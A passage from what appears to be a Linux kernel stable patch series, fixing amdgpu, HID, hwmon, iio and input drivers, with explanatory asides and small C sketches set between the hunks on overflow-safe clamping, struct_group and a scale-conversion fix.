++					     &block_width, &block_height);
+ 		} else {
+ 			int swizzle = AMD_FMT_MOD_GET(TILE, modifier);
+ 
+@@ -1033,7 +1056,8 @@ static int amdgpu_display_verify_sizes(struct amdgpu_framebuffer *rfb)
+ 			return ret;
+ 	}
+ 
+-	if (AMD_FMT_MOD_GET(DCC, modifier)) {
++	if (AMD_FMT_MOD_GET(TILE_VERSION, modifier) <= AMD_FMT_MOD_TILE_VER_GFX11 &&
++	    AMD_FMT_MOD_GET(DCC, modifier)) {
+ 		if (AMD_FMT_MOD_GET(DCC_RETILE, modifier)) {
+ 			block_size_log2 = get_dcc_block_size(modifier, false, false);
+ 			get_block_dimensions(block_size_log2 + 8, format_info->cpp[0],
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index af50e6ce39e17..d7b76a3d2d558 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -132,8 +132,10 @@ int amdgpu_virt_request_full_gpu(struct amdgpu_device *adev, bool init)
+ 
+ 	if (virt->ops && virt->ops->req_full_gpu) {
+ 		r = virt->ops->req_full_gpu(adev, init);
+-		if (r)
++		if (r) {
++			adev->no_hw_access = true;
+ 			return r;
++		}
+ 
+ 		adev->virt.caps &= ~AMDGPU_SRIOV_CAPS_RUNTIME;
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 1f9f7fdd4b8e0..c76895cca4d9a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -4330,11 +4330,11 @@ static int gfx_v11_0_hw_init(void *handle)
+ 			/* RLC autoload sequence 1: Program rlc ram */
+ 			if (adev->gfx.imu.funcs->program_rlc_ram)
+ 				adev->gfx.imu.funcs->program_rlc_ram(adev);
++			/* rlc autoload firmware */
++			r = gfx_v11_0_rlc_backdoor_autoload_enable(adev);
++			if (r)
++				return r;
+ 		}
+-		/* rlc autoload firmware */
+-		r = gfx_v11_0_rlc_backdoor_autoload_enable(adev);
+-		if (r)
+-			return r;
+ 	} else {
+ 		if (adev->firmware.load_type == AMDGPU_FW_LOAD_DIRECT) {
+ 			if (adev->gfx.imu.funcs && (amdgpu_dpm > 0)) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+index 657e4ca6f9dd2..fccbec438bbed 100644
+--- a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+@@ -135,6 +135,34 @@ static int ih_v6_0_toggle_ring_interrupts(struct amdgpu_device *adev,
+ 
+ 	tmp = RREG32(ih_regs->ih_rb_cntl);
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, RB_ENABLE, (enable ? 1 : 0));
++
++	if (enable) {
++		/* Unset the CLEAR_OVERFLOW bit to make sure the next step
++		 * is switching the bit from 0 to 1
++		 */
++		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++		if (amdgpu_sriov_vf(adev) && amdgpu_sriov_reg_indirect_ih(adev)) {
++			if (psp_reg_program(&adev->psp, ih_regs->psp_reg_id, tmp))
++				return -ETIMEDOUT;
++		} else {
++			WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++		}
++
++		/* Clear RB_OVERFLOW bit */
++		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
++		if (amdgpu_sriov_vf(adev) && amdgpu_sriov_reg_indirect_ih(adev)) {
++			if (psp_reg_program(&adev->psp, ih_regs->psp_reg_id, tmp))
++				return -ETIMEDOUT;
++		} else {
++			WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++		}
++
++		/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++		 * can be detected.
++		 */
++		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	}
++
+ 	/* enable_intr field is only valid in ring0 */
+ 	if (ih == &adev->irq.ih)
+ 		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, ENABLE_INTR, (enable ? 1 : 0));
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 0be1a1149a3fe..393e32259a77c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6767,7 +6767,7 @@ static int dm_update_mst_vcpi_slots_for_dsc(struct drm_atomic_state *state,
+ 			}
+ 		}
+ 
+-		if (j == dc_state->stream_count)
++		if (j == dc_state->stream_count || pbn_div == 0)
+ 			continue;
+ 
+ 		slot_num = DIV_ROUND_UP(pbn, pbn_div);
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c
+index 1ddb4f5eac8e5..93c0455766ddb 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c
+@@ -433,17 +433,20 @@ static enum mod_hdcp_status authenticated_dp(struct mod_hdcp *hdcp,
+ 	}
+ 
+ 	if (status == MOD_HDCP_STATUS_SUCCESS)
+-		mod_hdcp_execute_and_set(mod_hdcp_read_bstatus,
++		if (!mod_hdcp_execute_and_set(mod_hdcp_read_bstatus,
+ 				&input->bstatus_read, &status,
+-				hdcp, "bstatus_read");
++				hdcp, "bstatus_read"))
++			goto out;
+ 	if (status == MOD_HDCP_STATUS_SUCCESS)
+-		mod_hdcp_execute_and_set(check_link_integrity_dp,
++		if (!mod_hdcp_execute_and_set(check_link_integrity_dp,
+ 				&input->link_integrity_check, &status,
+-				hdcp, "link_integrity_check");
++				hdcp, "link_integrity_check"))
++			goto out;
+ 	if (status == MOD_HDCP_STATUS_SUCCESS)
+-		mod_hdcp_execute_and_set(check_no_reauthentication_request_dp,
++		if (!mod_hdcp_execute_and_set(check_no_reauthentication_request_dp,
+ 				&input->reauth_request_check, &status,
+-				hdcp, "reauth_request_check");
++				hdcp, "reauth_request_check"))
++			goto out;
+ out:
+ 	return status;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 5d193872fd1ad..dfd653e1b6ad5 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1871,7 +1871,8 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		smu_dpm_ctx->dpm_level = level;
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
++		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+ 		workload[0] = smu->workload_setting[index];
+@@ -1950,7 +1951,8 @@ static int smu_switch_power_profile(void *handle,
+ 		workload[0] = smu->workload_setting[index];
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
++		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
+ 		smu_bump_power_profile_mode(smu, workload, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/i915/i915_sw_fence.c b/drivers/gpu/drm/i915/i915_sw_fence.c
+index 6fc0d1b896902..e664f8e461e6d 100644
+--- a/drivers/gpu/drm/i915/i915_sw_fence.c
++++ b/drivers/gpu/drm/i915/i915_sw_fence.c
+@@ -51,7 +51,7 @@ static inline void debug_fence_init(struct i915_sw_fence *fence)
+ 	debug_object_init(fence, &i915_sw_fence_debug_descr);
+ }
+ 
+-static inline void debug_fence_init_onstack(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_init_onstack(struct i915_sw_fence *fence)
+ {
+ 	debug_object_init_on_stack(fence, &i915_sw_fence_debug_descr);
+ }
+@@ -77,7 +77,7 @@ static inline void debug_fence_destroy(struct i915_sw_fence *fence)
+ 	debug_object_destroy(fence, &i915_sw_fence_debug_descr);
+ }
+ 
+-static inline void debug_fence_free(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_free(struct i915_sw_fence *fence)
+ {
+ 	debug_object_free(fence, &i915_sw_fence_debug_descr);
+ 	smp_wmb(); /* flush the change in state before reallocation */
+@@ -94,7 +94,7 @@ static inline void debug_fence_init(struct i915_sw_fence *fence)
+ {
+ }
+ 
+-static inline void debug_fence_init_onstack(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_init_onstack(struct i915_sw_fence *fence)
+ {
+ }
+ 
+@@ -115,7 +115,7 @@ static inline void debug_fence_destroy(struct i915_sw_fence *fence)
+ {
+ }
+ 
+-static inline void debug_fence_free(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_free(struct i915_sw_fence *fence)
+ {
+ }
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_hid.c b/drivers/hid/amd-sfh-hid/amd_sfh_hid.c
+index 1b18291fc5afe..d682b99c25b1f 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_hid.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_hid.c
+@@ -171,11 +171,13 @@ int amdtp_hid_probe(u32 cur_hid_dev, struct amdtp_cl_data *cli_data)
+ void amdtp_hid_remove(struct amdtp_cl_data *cli_data)
+ {
+ 	int i;
++	struct amdtp_hid_data *hid_data;
+ 
+ 	for (i = 0; i < cli_data->num_hid_devices; ++i) {
+ 		if (cli_data->hid_sensor_hubs[i]) {
+-			kfree(cli_data->hid_sensor_hubs[i]->driver_data);
++			hid_data = cli_data->hid_sensor_hubs[i]->driver_data;
+ 			hid_destroy_device(cli_data->hid_sensor_hubs[i]);
++			kfree(hid_data);
+ 			cli_data->hid_sensor_hubs[i] = NULL;
+ 		}
+ 	}
+diff --git a/drivers/hid/hid-cougar.c b/drivers/hid/hid-cougar.c
+index cb8bd8aae15b5..0fa785f52707a 100644
+--- a/drivers/hid/hid-cougar.c
++++ b/drivers/hid/hid-cougar.c
+@@ -106,7 +106,7 @@ static void cougar_fix_g6_mapping(void)
+ static __u8 *cougar_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 				 unsigned int *rsize)
+ {
+-	if (rdesc[2] == 0x09 && rdesc[3] == 0x02 &&
++	if (*rsize >= 117 && rdesc[2] == 0x09 && rdesc[3] == 0x02 &&
+ 	    (rdesc[115] | rdesc[116] << 8) >= HID_MAX_USAGES) {
+ 		hid_info(hdev,
+ 			"usage count exceeds max: fixing up report descriptor\n");
+diff --git a/drivers/hv/vmbus_drv.c b/drivers/hv/vmbus_drv.c
+index e9c3f1e826baa..a2191bc5c1535 100644
+--- a/drivers/hv/vmbus_drv.c
++++ b/drivers/hv/vmbus_drv.c
+@@ -1977,6 +1977,7 @@ static umode_t vmbus_chan_attr_is_visible(struct kobject *kobj,
+ 
+ 	return attr->mode;
+ }
++EXPORT_SYMBOL_GPL(vmbus_device_unregister);
+ 
+ static struct attribute_group vmbus_chan_group = {
+ 	.attrs = vmbus_chan_attrs,
+diff --git a/drivers/hwmon/adc128d818.c b/drivers/hwmon/adc128d818.c
+index 97b330b6c165c..bad2d39d9733a 100644
+--- a/drivers/hwmon/adc128d818.c
++++ b/drivers/hwmon/adc128d818.c
+@@ -176,7 +176,7 @@ static ssize_t adc128_in_store(struct device *dev,
+ 
+ 	mutex_lock(&data->update_lock);
+ 	/* 10 mV LSB on limit registers */
+-	regval = clamp_val(DIV_ROUND_CLOSEST(val, 10), 0, 255);
++	regval = DIV_ROUND_CLOSEST(clamp_val(val, 0, 2550), 10);
+ 	data->in[index][nr] = regval << 4;
+ 	reg = index == 1 ? ADC128_REG_IN_MIN(nr) : ADC128_REG_IN_MAX(nr);
+ 	i2c_smbus_write_byte_data(data->client, reg, regval);
+@@ -214,7 +214,7 @@ static ssize_t adc128_temp_store(struct device *dev,
+ 		return err;
+ 
+ 	mutex_lock(&data->update_lock);
+-	regval = clamp_val(DIV_ROUND_CLOSEST(val, 1000), -128, 127);
++	regval = DIV_ROUND_CLOSEST(clamp_val(val, -128000, 127000), 1000);
+ 	data->temp[index] = regval << 1;
+ 	i2c_smbus_write_byte_data(data->client,
+ 				  index == 1 ? ADC128_REG_TEMP_MAX
+diff --git a/drivers/hwmon/lm95234.c b/drivers/hwmon/lm95234.c
+index b4a9d0c223c4a..db570fe84132c 100644
+--- a/drivers/hwmon/lm95234.c
++++ b/drivers/hwmon/lm95234.c
+@@ -301,7 +301,8 @@ static ssize_t tcrit2_store(struct device *dev, struct device_attribute *attr,
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, index ? 255 : 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, (index ? 255 : 127) * 1000),
++				1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->tcrit2[index] = val;
+@@ -350,7 +351,7 @@ static ssize_t tcrit1_store(struct device *dev, struct device_attribute *attr,
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, 255);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, 255000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->tcrit1[index] = val;
+@@ -391,7 +392,7 @@ static ssize_t tcrit1_hyst_store(struct device *dev,
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	val = DIV_ROUND_CLOSEST(val, 1000);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, -255000, 255000), 1000);
+ 	val = clamp_val((int)data->tcrit1[index] - val, 0, 31);
+ 
+ 	mutex_lock(&data->update_lock);
+@@ -431,7 +432,7 @@ static ssize_t offset_store(struct device *dev, struct device_attribute *attr,
+ 		return ret;
+ 
+ 	/* Accuracy is 1/2 degrees C */
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 500), -128, 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, -64000, 63500), 500);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->toffset[index] = val;
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index 9720ad214c20b..83e424945b598 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -2171,7 +2171,7 @@ store_temp_offset(struct device *dev, struct device_attribute *attr,
+ 	if (err < 0)
+ 		return err;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), -128, 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, -128000, 127000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->temp_offset[nr] = val;
+diff --git a/drivers/hwmon/w83627ehf.c b/drivers/hwmon/w83627ehf.c
+index 939d4c35e713c..66d71aba41711 100644
+--- a/drivers/hwmon/w83627ehf.c
++++ b/drivers/hwmon/w83627ehf.c
+@@ -895,7 +895,7 @@ store_target_temp(struct device *dev, struct device_attribute *attr,
+ 	if (err < 0)
+ 		return err;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, 127000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->target_temp[nr] = val;
+@@ -920,7 +920,7 @@ store_tolerance(struct device *dev, struct device_attribute *attr,
+ 		return err;
+ 
+ 	/* Limit the temp to 0C - 15C */
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, 15);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, 15000), 1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	reg = w83627ehf_read_value(data, W83627EHF_REG_TOLERANCE[nr]);
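All four hwmon changes above (adc128d818, lm95234, nct6775, w83627ehf) apply the same pattern: clamp the user-supplied value to the representable range first, then divide. Dividing first looks equivalent, but DIV_ROUND_CLOSEST() adds half the divisor before dividing, which overflows for values near LONG_MAX. A sketch with simplified macros (the kernel's helpers are more general; this DIV_ROUND_CLOSEST assumes d > 0):

    #include <limits.h>
    #include <stdio.h>

    #define clamp_val(v, lo, hi)    ((v) < (lo) ? (lo) : (v) > (hi) ? (hi) : (v))
    #define DIV_ROUND_CLOSEST(x, d) (((x) >= 0 ? (x) + (d) / 2 : (x) - (d) / 2) / (d))

    int main(void)
    {
            long val = LONG_MAX;    /* e.g. a huge value written to sysfs */

            /* clamp first: every intermediate value stays in range */
            printf("%ld\n", DIV_ROUND_CLOSEST(clamp_val(val, -128000L, 127000L), 1000L)); /* 127 */

            /* divide first: (val + 500) overflows before the clamp can help:
             * clamp_val(DIV_ROUND_CLOSEST(val, 1000L), -128L, 127L) is UB */
            return 0;
    }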
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dma.c b/drivers/i3c/master/mipi-i3c-hci/dma.c
+index 337c95d43f3f6..edc3a69bfe31f 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dma.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dma.c
+@@ -291,7 +291,10 @@ static int hci_dma_init(struct i3c_hci *hci)
+ 
+ 		rh->ibi_chunk_sz = dma_get_cache_alignment();
+ 		rh->ibi_chunk_sz *= IBI_CHUNK_CACHELINES;
+-		BUG_ON(rh->ibi_chunk_sz > 256);
++		if (rh->ibi_chunk_sz > 256) {
++			ret = -EINVAL;
++			goto err_out;
++		}
+ 
+ 		ibi_status_ring_sz = rh->ibi_status_sz * rh->ibi_status_entries;
+ 		ibi_data_ring_sz = rh->ibi_chunk_sz * rh->ibi_chunks_total;
+diff --git a/drivers/iio/adc/ad7124.c b/drivers/iio/adc/ad7124.c
+index 4088786e1026d..deaf600d96fba 100644
+--- a/drivers/iio/adc/ad7124.c
++++ b/drivers/iio/adc/ad7124.c
+@@ -146,15 +146,18 @@ struct ad7124_chip_info {
+ struct ad7124_channel_config {
+ 	bool live;
+ 	unsigned int cfg_slot;
+-	enum ad7124_ref_sel refsel;
+-	bool bipolar;
+-	bool buf_positive;
+-	bool buf_negative;
+-	unsigned int vref_mv;
+-	unsigned int pga_bits;
+-	unsigned int odr;
+-	unsigned int odr_sel_bits;
+-	unsigned int filter_type;
++	/* Following fields are used to compare equality. */
++	struct_group(config_props,
++		enum ad7124_ref_sel refsel;
++		bool bipolar;
++		bool buf_positive;
++		bool buf_negative;
++		unsigned int vref_mv;
++		unsigned int pga_bits;
++		unsigned int odr;
++		unsigned int odr_sel_bits;
++		unsigned int filter_type;
++	);
+ };
+ 
+ struct ad7124_channel {
+@@ -333,11 +336,12 @@ static struct ad7124_channel_config *ad7124_find_similar_live_cfg(struct ad7124_
+ 	ptrdiff_t cmp_size;
+ 	int i;
+ 
+-	cmp_size = (u8 *)&cfg->live - (u8 *)cfg;
++	cmp_size = sizeof_field(struct ad7124_channel_config, config_props);
+ 	for (i = 0; i < st->num_channels; i++) {
+ 		cfg_aux = &st->channels[i].cfg;
+ 
+-		if (cfg_aux->live && !memcmp(cfg, cfg_aux, cmp_size))
++		if (cfg_aux->live &&
++		    !memcmp(&cfg->config_props, &cfg_aux->config_props, cmp_size))
+ 			return cfg_aux;
+ 	}
+ 
+@@ -761,6 +765,7 @@ static int ad7124_soft_reset(struct ad7124_state *st)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	fsleep(200);
+ 	timeout = 100;
+ 	do {
+ 		ret = ad_sd_read_reg(&st->sd, AD7124_STATUS, 1, &readval);
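A note on the struct_group() rework in this file: the macro (from linux/stddef.h) wraps the listed members in an anonymous union holding both an anonymous struct, so existing cfg->refsel-style accesses keep compiling, and a named mirror struct, so the group can be taken as one unit for sizeof_field() and memcmp(). A hand-expanded sketch of the idea with a reduced, made-up field set:

    #include <stdio.h>
    #include <string.h>

    /* hand-expanded equivalent of struct_group(config_props, ...) */
    struct cfg_sketch {
            int live;
            union {
                    struct {                /* keeps cfg.refsel working */
                            int refsel;
                            unsigned int odr;
                    };
                    struct {                /* addressable as one unit */
                            int refsel;
                            unsigned int odr;
                    } config_props;
            };
    };

    int main(void)
    {
            struct cfg_sketch a = { .live = 1, .refsel = 2, .odr = 100 };
            struct cfg_sketch b = { .live = 0, .refsel = 2, .odr = 100 };

            /* equality of the grouped fields only; 'live' is excluded */
            printf("%d\n", !memcmp(&a.config_props, &b.config_props,
                                   sizeof(a.config_props))); /* 1 */
            return 0;
    }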
+diff --git a/drivers/iio/adc/ad7606.c b/drivers/iio/adc/ad7606.c
+index ba24f99523e01..00df4fc5a51f0 100644
+--- a/drivers/iio/adc/ad7606.c
++++ b/drivers/iio/adc/ad7606.c
+@@ -49,7 +49,7 @@ static const unsigned int ad7616_oversampling_avail[8] = {
+ 	1, 2, 4, 8, 16, 32, 64, 128,
+ };
+ 
+-static int ad7606_reset(struct ad7606_state *st)
++int ad7606_reset(struct ad7606_state *st)
+ {
+ 	if (st->gpio_reset) {
+ 		gpiod_set_value(st->gpio_reset, 1);
+@@ -60,6 +60,7 @@ static int ad7606_reset(struct ad7606_state *st)
+ 
+ 	return -ENODEV;
+ }
++EXPORT_SYMBOL_NS_GPL(ad7606_reset, IIO_AD7606);
+ 
+ static int ad7606_reg_access(struct iio_dev *indio_dev,
+ 			     unsigned int reg,
+@@ -88,31 +89,6 @@ static int ad7606_read_samples(struct ad7606_state *st)
+ {
+ 	unsigned int num = st->chip_info->num_channels - 1;
+ 	u16 *data = st->data;
+-	int ret;
+-
+-	/*
+-	 * The frstdata signal is set to high while and after reading the sample
+-	 * of the first channel and low for all other channels. This can be used
+-	 * to check that the incoming data is correctly aligned. During normal
+-	 * operation the data should never become unaligned, but some glitch or
+-	 * electrostatic discharge might cause an extra read or clock cycle.
+-	 * Monitoring the frstdata signal allows to recover from such failure
+-	 * situations.
+-	 */
+-
+-	if (st->gpio_frstdata) {
+-		ret = st->bops->read_block(st->dev, 1, data);
+-		if (ret)
+-			return ret;
+-
+-		if (!gpiod_get_value(st->gpio_frstdata)) {
+-			ad7606_reset(st);
+-			return -EIO;
+-		}
+-
+-		data++;
+-		num--;
+-	}
+ 
+ 	return st->bops->read_block(st->dev, num, data);
+ }
+diff --git a/drivers/iio/adc/ad7606.h b/drivers/iio/adc/ad7606.h
+index 2dc4f599f9df9..9d8520b8bada0 100644
+--- a/drivers/iio/adc/ad7606.h
++++ b/drivers/iio/adc/ad7606.h
+@@ -153,6 +153,8 @@ int ad7606_probe(struct device *dev, int irq, void __iomem *base_address,
+ 		 const char *name, unsigned int id,
+ 		 const struct ad7606_bus_ops *bops);
+ 
++int ad7606_reset(struct ad7606_state *st);
++
+ enum ad7606_supported_device_ids {
+ 	ID_AD7605_4,
+ 	ID_AD7606_8,
+diff --git a/drivers/iio/adc/ad7606_par.c b/drivers/iio/adc/ad7606_par.c
+index b912b4df9b563..0827d55355840 100644
+--- a/drivers/iio/adc/ad7606_par.c
++++ b/drivers/iio/adc/ad7606_par.c
+@@ -7,6 +7,7 @@
+ 
+ #include <linux/mod_devicetable.h>
+ #include <linux/module.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/platform_device.h>
+ #include <linux/types.h>
+ #include <linux/err.h>
+@@ -21,8 +22,29 @@ static int ad7606_par16_read_block(struct device *dev,
+ 	struct iio_dev *indio_dev = dev_get_drvdata(dev);
+ 	struct ad7606_state *st = iio_priv(indio_dev);
+ 
+-	insw((unsigned long)st->base_address, buf, count);
+ 
++	/*
++	 * On the parallel interface, the frstdata signal is set to high while
++	 * and after reading the sample of the first channel and low for all
++	 * other channels.  This can be used to check that the incoming data is
++	 * correctly aligned.  During normal operation the data should never
++	 * become unaligned, but some glitch or electrostatic discharge might
++	 * cause an extra read or clock cycle.  Monitoring the frstdata signal
++	 * allows recovery from such failure situations.
++	 */
++	int num = count;
++	u16 *_buf = buf;
++
++	if (st->gpio_frstdata) {
++		insw((unsigned long)st->base_address, _buf, 1);
++		if (!gpiod_get_value(st->gpio_frstdata)) {
++			ad7606_reset(st);
++			return -EIO;
++		}
++		_buf++;
++		num--;
++	}
++	insw((unsigned long)st->base_address, _buf, num);
+ 	return 0;
+ }
+ 
+@@ -35,8 +57,28 @@ static int ad7606_par8_read_block(struct device *dev,
+ {
+ 	struct iio_dev *indio_dev = dev_get_drvdata(dev);
+ 	struct ad7606_state *st = iio_priv(indio_dev);
+-
+-	insb((unsigned long)st->base_address, buf, count * 2);
++	/*
++	 * On the parallel interface, the frstdata signal is set to high while
++	 * and after reading the sample of the first channel and low for all
++	 * other channels.  This can be used to check that the incoming data is
++	 * correctly aligned.  During normal operation the data should never
++	 * become unaligned, but some glitch or electrostatic discharge might
++	 * cause an extra read or clock cycle.  Monitoring the frstdata signal
++	 * allows recovery from such failure situations.
++	 */
++	int num = count;
++	u16 *_buf = buf;
++
++	if (st->gpio_frstdata) {
++		insb((unsigned long)st->base_address, _buf, 2);
++		if (!gpiod_get_value(st->gpio_frstdata)) {
++			ad7606_reset(st);
++			return -EIO;
++		}
++		_buf++;
++		num--;
++	}
++	insb((unsigned long)st->base_address, _buf, num * 2);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iio/buffer/industrialio-buffer-dmaengine.c b/drivers/iio/buffer/industrialio-buffer-dmaengine.c
+index f744b62a636ad..3d2ccae1e58dd 100644
+--- a/drivers/iio/buffer/industrialio-buffer-dmaengine.c
++++ b/drivers/iio/buffer/industrialio-buffer-dmaengine.c
+@@ -180,7 +180,7 @@ static struct iio_buffer *iio_dmaengine_buffer_alloc(struct device *dev,
+ 
+ 	ret = dma_get_slave_caps(chan, &caps);
+ 	if (ret < 0)
+-		goto err_free;
++		goto err_release;
+ 
+ 	/* Needs to be aligned to the maximum of the minimums */
+ 	if (caps.src_addr_widths)
+@@ -206,6 +206,8 @@ static struct iio_buffer *iio_dmaengine_buffer_alloc(struct device *dev,
+ 
+ 	return &dmaengine_buffer->queue.buffer;
+ 
++err_release:
++	dma_release_channel(chan);
+ err_free:
+ 	kfree(dmaengine_buffer);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/iio/inkern.c b/drivers/iio/inkern.c
+index bd854e92c6f8c..81344ceac951c 100644
+--- a/drivers/iio/inkern.c
++++ b/drivers/iio/inkern.c
+@@ -679,17 +679,17 @@ static int iio_convert_raw_to_processed_unlocked(struct iio_channel *chan,
+ 		break;
+ 	case IIO_VAL_INT_PLUS_MICRO:
+ 		if (scale_val2 < 0)
+-			*processed = -raw64 * scale_val;
++			*processed = -raw64 * scale_val * scale;
+ 		else
+-			*processed = raw64 * scale_val;
++			*processed = raw64 * scale_val * scale;
+ 		*processed += div_s64(raw64 * (s64)scale_val2 * scale,
+ 				      1000000LL);
+ 		break;
+ 	case IIO_VAL_INT_PLUS_NANO:
+ 		if (scale_val2 < 0)
+-			*processed = -raw64 * scale_val;
++			*processed = -raw64 * scale_val * scale;
+ 		else
+-			*processed = raw64 * scale_val;
++			*processed = raw64 * scale_val * scale;
+ 		*processed += div_s64(raw64 * (s64)scale_val2 * scale,
+ 				      1000000000LL);
+ 		break;
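The inkern fix restores the 'scale' factor on the integer part of the conversion: the processed value is raw * (scale_val + scale_val2 / 10^6) * scale, and before the change only the fractional term carried 'scale'. Worked through with assumed numbers (raw = 100, a scale of 1.5, and a caller unit factor of 1000):

    #include <stdio.h>
    #include <stdint.h>

    /* minimal sketch of IIO_VAL_INT_PLUS_MICRO processing for a
     * non-negative scale; both terms must carry 'scale' */
    static int64_t processed(int64_t raw, int scale_val, int scale_val2,
                             unsigned int scale)
    {
            return raw * scale_val * scale +
                   raw * (int64_t)scale_val2 * scale / 1000000LL;
    }

    int main(void)
    {
            /* expect 150000; the pre-fix arithmetic produced 50100 */
            printf("%lld\n", (long long)processed(100, 1, 500000, 1000));
            return 0;
    }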
+diff --git a/drivers/input/misc/uinput.c b/drivers/input/misc/uinput.c
+index f2593133e5247..790db3ceb2083 100644
+--- a/drivers/input/misc/uinput.c
++++ b/drivers/input/misc/uinput.c
+@@ -416,6 +416,20 @@ static int uinput_validate_absinfo(struct input_dev *dev, unsigned int code,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * Limit number of contacts to a reasonable value (100). This
++	 * ensures that we need less than 2 pages for struct input_mt
++	 * (we are not using in-kernel slot assignment so not going to
++	 * allocate memory for the "red" table), and we should have no
++	 * trouble getting this much memory.
++	 */
++	if (code == ABS_MT_SLOT && max > 99) {
++		printk(KERN_DEBUG
++		       "%s: unreasonably large number of slots requested: %d\n",
++		       UINPUT_NAME, max);
++		return -EINVAL;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
+index e3a36cd3656c0..8c8eea5173f7b 100644
+--- a/drivers/input/touchscreen/ili210x.c
++++ b/drivers/input/touchscreen/ili210x.c
